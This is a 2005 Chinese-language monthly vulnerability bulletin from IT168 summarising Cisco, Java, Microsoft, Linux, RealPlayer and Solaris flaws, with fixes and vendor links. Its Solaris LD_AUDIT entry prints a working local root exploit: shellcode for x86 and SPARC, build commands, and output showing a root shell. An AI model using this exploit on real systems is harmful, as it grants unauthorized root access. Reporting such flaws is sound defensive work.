【IT168 报道】IT168服务器频道7月号的服务器(网络)安全漏洞及解决方案播报又和您见面了。
新漏洞
1、Cisco RADIUS Authentication 漏洞
CVE编号:无
发布日期:2005-07-01
漏洞类型:其它
漏洞评估:中风险
受影响版本:
Cisco IOS 12.2T based trains
Cisco IOS 12.3 based trains
Cisco IOS 12.3T based trains
Cisco IOS 12.4 based trains
漏洞描述:Remote Authentication Dial In User Service(RADIUS,远程拨入用户认证服务)服务器可用于对使用RADIUS协议的终端进行认证、授权和统计,基于RFC 2865,它可应用多种操作系统之下。
运行在Cisco Internetworking Operating System(IOS,Cisco网络设备所使用的互联网操作系统)上且RADIUS的fallback配置方式为none时,远程拨入用户认证服务可以被直接绕过。
漏洞危害:利用此漏洞可直接绕过RADIUS认证,非认证授权访问网络。
解决方案:建议及时下载安装厂商提供的补丁。
参考信息:
http://www.ciac.org/ciac/bulletins/p-237.shtml
http://www.cisco.com/en/US/products/products_security_advisory09186a00804ae616.shtml
2、Cisco IOS AAA RADIUS认证绕过漏洞
CVE编号:无
发布日期:2005-06-30
漏洞类型:远程验证
漏洞评估:高风险
受影响版本:Cisco IOS 12.4、Cisco IOS 12.3T、Cisco IOS 12.3、Cisco IOS 12.2T
漏洞描述:
Cisco IOS是Cisco网络设备所使用的互联网操作系统。
Cisco IOS远程认证拨号用户服务(RADIUS)中存在远程认证绕过漏洞。
如果将AAA RADIUS的fallback方式配置为none的话,攻击者就可以通过发送超长的用户名绕过RADIUS认证,非授权访问网络资源。
解决方案:
临时解决方法:如果您不能立刻安装补丁或者升级,CNNS建议您采取以下措施以降低威胁:
删除none fallback方式,或在RADIUS和none之间至少添加一种local以外的方式。
厂商补丁:Cisco已经为此发布了一个安全公告(cisco-sa-20050629-aaa)以及相应补丁:
cisco-sa-20050629-aaa:RADIUS Authentication Bypass
链接:http://www.cisco.com/warp/public/707/cisco-sa-20050629-aaa.shtml
参考信息: http://www.cisco.com/warp/public/707/cisco-sa-20050629-aaa.shtml
3、Java Runtime Environment 中的安全漏洞导致权限提升
CVE编号:CAN-2005-1973;CAN-2005-1974
发布日期:2005-06-16
漏洞类型:权限提升
漏洞评估:高风险
受影响版本:
Java 2 Platform, Standard Edition (J2SE) 5.0 Software
J2SE 1.4.2_07 and earlier 1.4.2 releases
漏洞描述:Java Runtime Environment 中的安全漏洞可以导致未经信任的 Applet 应用程序提升权限。存在的漏洞允许 Applet 应用软件建立本地文件或执行其它Applet 应用程序,从而可以让攻击者获得权限提升而进行攻击。
解决方案:立即升级到最新版本
参考信息:http://sunsolve.sun.com/search/printfriendly.do?assetkey=1-26-101749-1
4、Microsoft 安全公告 MS05-034:ISA Server 2000 的累积性安全更新
CVE编号: CAN-2005-1215;CAN-2005-1216
发布日期:2005-06-15
漏洞类型:权限提升
漏洞评估:中风险
受影响版本:Microsoft Internet Security and Acceleration (ISA) Server 2000 Service Pack 2
漏洞描述:
该更新可消除一些秘密报告的新发现的漏洞。ISA Server 2000 由于处理格式不正确的 HTTP 请求的方式而存在一个漏洞。攻击者可以通过构建恶意的 HTTP 请求来利用该漏洞。该漏洞可能允许攻击者损害受影响的 ISA Server 的缓存。因此,攻击者可能绕过内容限制并访问他们通常没有权限访问的内容,或者导致用户定向到意外内容。而且,攻击者可能将此漏洞与一个独立的跨站脚本执行漏洞结合使用,从而获取登录凭据之类的敏感信息。ISA Server 2000 中存在一个特权提升漏洞。成功利用此漏洞的攻击者可以通过利用 NetBIOS(所有)预定义数据包筛选器来创建与 ISA Server 的 NetBIOS 连接。攻击者限于那些使用在受影响的 ISA Server 上运行的 NetBIOS 协议的服务。
解决方案:立即升级微软系统补丁
参考信息:http://www.microsoft.com/china/technet/security/bulletin/MS05-034.mspx
历史漏洞
1、Microsoft 安全公告MS05-030:Outlook Express NNTP响应解析溢出漏洞
CVE编号:CAN-2005-1213
发布日期:2005 年 6 月 14 日
漏洞类型:Windows测试
漏洞评估:高风险
受影响版本:Microsoft Windows 2000 Service Pack 3、Microsoft Windows 2000 Service Pack 4、
Microsoft Windows XP Service Pack 1、Microsoft Windows Server 2003
漏洞描述:Outlook Express 用作新闻组阅读程序时存在一个远程执行代码漏洞。 攻击者可以通过构建恶意的新闻组服务器来利用此漏洞。当用户在服务器上查询新闻时,此漏洞可能允许执行远程代码。成功利用此漏洞的攻击者可以完全控制受影响的系统。 不过,要利用此漏洞,需要进行用户交互。
解决方案:升级微软补丁
参考信息:http://www.microsoft.com/china/technet/security/bulletin/ms05-030.mspx
2、微软安全公告MS05-032:Microsoft Agent 中的漏洞可能允许欺骗
CVE编号:CAN-2005-1214
发布日期:2005 年 6 月 14 日
漏洞类型:Windows测试
漏洞评估:中风险
受影响版本:Microsoft Windows 2000 Service Pack 3 、Microsoft Windows 2000 Service Pack 4、Microsoft Windows XP Service Pack 1、Microsoft Windows XP Service Pack 2、Microsoft Windows Server 2003、Microsoft Windows Server 2003 Service Pack 1
漏洞描述:远程的windows主机的 Microsoft Agent 服务存在一个漏洞,攻击者可以进行受信任 Internet 内容欺骗的欺骗漏洞。 用户可能相信他们正在访问受信任的 Internet 内容。
但是,他们正在访问的却是恶意 Internet 内容(例如恶意网站)。 攻击者首先必须劝诱用户访问攻击者的站点,以试图利用此漏洞。
在基于 Web 的攻击中,攻击者必须拥有一个网站,并在上面放置用来利用此漏洞的网页。 攻击者无法强迫用户访问恶意网站。 相反,攻击者必须诱使用户访问该网站,所采用的方式通常是让用户单击指向攻击者网站的链接。 在用户单击此链接后,将会提示他们执行几项操作。 只有在用户执行这些操作之后才会遭到攻击。
解决方案:升级微软补丁
参考信息:http://www.microsoft.com/china/technet/security/bulletin/ms05-032.mspx
3、Microsoft 安全公告 MS05-028:Web 客户端服务中的漏洞可能允许远程执行代码
CVE编号:CAN-2005-1207
发布日期:2005-06-15
漏洞类型:远程执行代码
漏洞评估:中风险
受影响版本:
Microsoft Windows XP Service Pack 1
Microsoft Windows Server 2003
漏洞描述:
此更新可消除一个秘密报告的新发现漏洞。Windows 处理 Web 客户端请求的方式中存在一个远程执行代码漏洞,该 Web 客户端请求允许成功利用此漏洞的攻击者完全控制受影响的系统。
解决方案:升级微软补丁
参考信息:http://www.microsoft.com/china/technet/security/bulletin/MS05-028.mspx
4、Microsoft Windows远程桌面协议服务程序密钥泄露漏洞
CVE编号:无
发布日期:2005-06-1
漏洞类型:输入验证错误
漏洞评估:高风险
受影响版本:Microsoft RDP 5.2、Microsoft RDP 5.1、Microsoft RDP 5.0、Microsoft RDP 4.0
漏洞描述:Microsoft Windows远程桌面协议(RDP)服务允许客户端访问MS的终端服务。Microsoft Windows远程桌面协议的实现在处理密钥的交换时存在漏洞,远程攻击者可能利用此漏洞窃取服务器的加密密钥。起因是尽管通过网络传输的信息已经过加密,但在建立会话的加密密钥时没有核实服务器的身份,导致攻击者可以获得密钥,计算出有效的签名,然后发动中间人攻击。成功利用这个漏洞的攻击者可以完全控制连接在服务器上的客户端。
解决方案:升级微软补丁
参考信息:
http://www.oxid.it/downloads/rdp-gbu.pdf
http://www.nsfocus.net/index.php?act=sec_bug&do=view&bug_id=7766&keyword=
http://www.microsoft.com/technet/security/
5、Linux Kernel DRM IOCTL函数未明权限提升漏洞
CVE编号:无
发布日期:2005-06-10
漏洞类型:设计错误,输入验证错误
漏洞评估:高风险
受影响版本:Linux kernel 2.6.8、Linux kernel 2.6.5、Linux kernel 2.6.11、S.u.S.E. Linux Enterprise Server 9、S.u.S.E. Linux 9.3 x86_64、S.u.S.E. Linux 9.3
漏洞描述:Linux Kernel是Linux操作系统所使用的内核。 Linux Kernel中存在未明的权限提升漏洞,本地攻击者获得root用户权限。原因在于对DRM ioctl函数没有做充分的检查。
解决方案:
http://www.novell.com/linux/security/advisories/2005_29_kernel.html
参考信息:
http://www.novell.com/linux/security/advisories/2005_29_kernel.html
6、RealNetworks RealPlayer vidplin.dll堆溢出漏洞
CVE编号:无
发布日期:2005-06-24
漏洞类型:设计错误,输入验证错误
漏洞评估:中风险
受影响版本:Real Networks RealPlayer Enterprise for Windows、Real Networks RealPlayer 8 for Windows、Real Networks RealPlayer 10.5 for Windows、Real Networks RealPlayer 10 for Windows、Real Networks RealOne Player V2 for Windows、Real Networks RealOne Player V1 for Windows
漏洞描述:RealNetworks RealPlayer是非常流行的媒体播放器,适用于多种操作系统,包括Microsoft Windows,Linux和Mac OS。
RealPlayer中存在严重的堆溢出漏洞,攻击者可以利用恶意的AVI媒体文件触发漏洞在运行了RealPlayer的机器上执行任意指令。
在处理AVI文件时RealPlayer会调用一个特定的DLL(vidplin.dll)。 Realplayer依赖于strf架构值,分配0x428固定的内存空间,而大于这个固定大小缓冲区的值可以覆盖这个空间,导致执行任意指令。
解决方案:目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://service.real.com/help/faq/security/050623_player/EN/
参考信息:
http://service.real.com/help/faq/security/050623_player/EN/
7、Sun Solaris运行时连接器LD_AUDIT权限提升漏洞
CVE编号:无
发布日期:2005-06-24
漏洞类型:设计缺陷
漏洞评估:高风险
受影响版本:Sun Solaris 9.0_x86、Sun Solaris 9.0、Sun Solaris 8.0_x86、Sun Solaris 8.0、Sun Solaris 10_x86、
Sun Solaris 10.0
漏洞描述:Solaris是一款由Sun开发和维护的商业性质UNIX操作系统。
Sun Solaris运行时连接器对某些环境变量没有做正确检查,本地攻击者可能利用此漏洞提升自己的权限。
起因是Solaris 9和10的ld.so在运行s[ug]id二进制程序时没有检查LD_AUDIT环境变量,导致以提升的权限运行任意代码。
攻击方法:以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
未打补丁的Solaris 10 (AMD64):
atari:venglin:~> cat dupa.c
static char sh[] =
"\x31\xc0\xeb\x09\x5a\x89\x42\x01\x88\x42\x06\xeb\x0d\xe8\xf2\xff\xff\xff\x9a\x01\x01\ \
x01\x01\x07\x01\xc3\x50\xb0\x17\xe8\xf0\xff\xff\xff\x31\xc0\x68\x2f\x73\x68\x5f\x68\x2 \
f\x62\x69\x6e\x88\x44\x24\x07\x89\xe3\x50\x53\x8d\x0c\x24\x8d\x54\x24\x04\x52\x51\x53\ \
xb0\x0b\xe8\xcb\xff\xff\xff";
int la_version() {
void (*f)();
f = (void*)sh;
f();
return 3;
}
atari:venglin:~> gcc -fPIC -shared -o /tmp/dupa.so dupa.c
atari:venglin:~> setenv LD_AUDIT /tmp/dupa.so
atari:venglin:~> su
# id
uid=0(root) gid=10(staff)
SPARC上的Solaris 9:
$ cat dupa.c
char sh[] =
/* setuid() */
"\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08"
/* execve() */
"\x20\xbf\xff\xff\x20\xbf\xff\xff\x7f\xff\xff\xff\x90\x03\xe0\x20"
"\x92\x02\x20\x10\xc0\x22\x20\x08\xd0\x22\x20\x10\xc0\x22\x20\x14"
"\x82\x10\x20\x0b\x91\xd0\x20\x08/bin/ksh";
int la_version() {
void (*f)();
f = (void*)sh;
f();
return 3;
}
$ gcc -fPIC -shared -o /tmp/dupa.so dupa.c
$ export LD_AUDIT=/tmp/dupa.so
$ ping
# id
uid=0(root) gid=100(student)
解决方案:
临时解决方法:如果您不能立刻安装补丁或者升级,CNNS建议您采取以下措施以降低威胁:
* 运行Solaris 8或Solaris 9的用户可以使用patchrm(1M)命令将相关的连接器补丁退回到不受影响的版本.如果无法卸载补丁,可以通过以下步骤在系统中以root用户替换较早版本补丁的ld.so.1(1M)文件:
1. 如下所示从补丁中将ld.so.1文件拷贝到系统:
# cp ./SUNWcsu/reloc/usr/lib/ld.so.1 /usr/lib/ld.so.1-patch
2. 使用ln(1)为已有运行时连接器创建到新文件的目录条目(链接):
# cd /usr/lib ; ln ld.so.1 ld.so.1.original
3. 再次使用ln(1)为之前拷贝的打过补丁的运行时连接器创建到当前运行时连接器的目录条目(链接):
# cd /usr/lib ; ln ld.so.1-patch ld.so.1
4. 对于以64位模式运行的SPARC系统,必须将补丁中位于./SUNWcsxu/reloc/usr/lib/sparcv9/ld.so.1的运行时连接器拷贝到"/usr/lib/sparcv9",然后使用"/usr/lib/sparcv9"路径而不是"/usr/lib"重复上文中的步骤.
厂商补丁:目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://sunsolve.sun.com/security
参考信息:
http://sunsolve.sun.com/security
信息来源:感谢榕基企业提供漏洞播报